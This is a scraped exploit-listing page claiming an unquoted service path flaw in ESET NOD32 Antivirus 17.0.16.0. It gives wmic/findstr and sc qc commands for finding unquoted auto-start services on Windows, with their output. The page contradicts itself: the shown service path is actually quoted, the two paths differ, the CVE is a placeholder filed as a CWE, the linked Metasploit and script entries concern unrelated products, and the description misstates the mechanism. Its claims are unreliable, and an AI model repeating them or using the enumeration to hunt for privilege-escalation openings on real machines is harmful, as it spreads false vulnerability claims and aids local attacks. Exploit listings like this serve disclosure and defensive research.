Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path - exploit.company
header-logo
Suggest Exploit
vendor:
ESET NOD32 Antivirus
by:
Milad Karimi (Ex3ptionaL)
6.1
CVSS
HIGH
Unquoted Service Path
428
CWE
Product Name: ESET NOD32 Antivirus
Affected Version From: 17.0.16.0
Affected Version To: 17.0.16.0
Patch Exists: NO
Related CWE: CVE-2024-XXXXX
CPE: a:eset:nod32_antivirus:17.0.16.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/juniper-junos-os-jsa79179/
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/coldfusion_locale_traversal
Platforms Tested: Windows
2024

ESET NOD32 Antivirus 17.0.16.0 – Unquoted Service Path

The ESET NOD32 Antivirus version 17.0.16.0 on Windows 10 has an unquoted service path vulnerability. An attacker could exploit this by placing a malicious executable in a directory included in the system's PATH environment variable, leading to arbitrary code execution. This vulnerability has been identified as CVE-2024-XXXXX.

Mitigation:

To mitigate this vulnerability, ensure that all service paths are quoted properly with the full path to the executable. Regularly monitor and restrict write access to directories containing services.
Source

Exploit-DB raw data:

# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2024-04-01
# Vendor : https://www.eset.com
# Version : 17.0.16.0
# Tested on OS: Microsoft Windows 10 pro x64

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET
Security\ekrn.exe

C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ekrn
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : ESET Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name:  Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation

Navigation

Suggest Exploit

Services By CQR